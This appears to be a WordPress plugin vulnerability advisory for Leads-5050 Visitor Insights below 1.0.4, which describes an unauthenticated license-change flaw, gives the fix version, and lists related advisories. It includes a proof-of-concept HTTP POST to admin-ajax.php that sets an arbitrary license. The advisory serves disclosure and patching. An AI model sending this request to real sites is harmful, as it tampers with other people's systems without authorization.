Leads-5050 Visitor Insights < 1.0.4 – Unauthenticated License Change | Plugin Vulnerabilities

Description

The leads5050_set_license AJAX action was available to unauthenticated users allowing them to set an arbitrary license in the plugins settings

Proof of Concept

POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 46
Connection: close

action=leads5050_set_license&api_license=AAAA2

Affects Plugins

leads-5050-visitor-insights

Fixed in 1.0.4

References

URL

https://plugins.trac.wordpress.org/changeset/2477098

Classification

Type

ACCESS CONTROLS

OWASP top 10

A5: Broken Access Control

CWE

CVSS

Miscellaneous

Verified

Yes

WPVDB ID

8ab02102-e4ee-4262-a785-0e9c6a30251f

Timeline

Publicly Published

2021-05-07 (about 3 years ago)

Added

2021-05-07 (about 3 years ago)

Last Updated

2021-05-07 (about 3 years ago)

Other

Published

Title

Published

2021-08-17

Title

PostX Gutenberg Blocks for Post Grid < 2.4.10 - Missing Access Controls

Published

2021-07-07

Title

WP Upload Restriction < 2.2.5 - Missing Access Control in getSelectedMimeTypesByRole

Published

2022-05-18

Title

Jupiter < 6.10.2 & JupiterX < 2.0.7 - Subscriber+ Path Traversal and Local File Inclusion

Published

2021-09-21

Title

WP Mega Menu < 1.4.1 - Subscriber+ Arbitrary Post Access

Published

2023-10-16

Title

Templately < 2.2.6 - Unauthenticated Arbitrary Post Deletion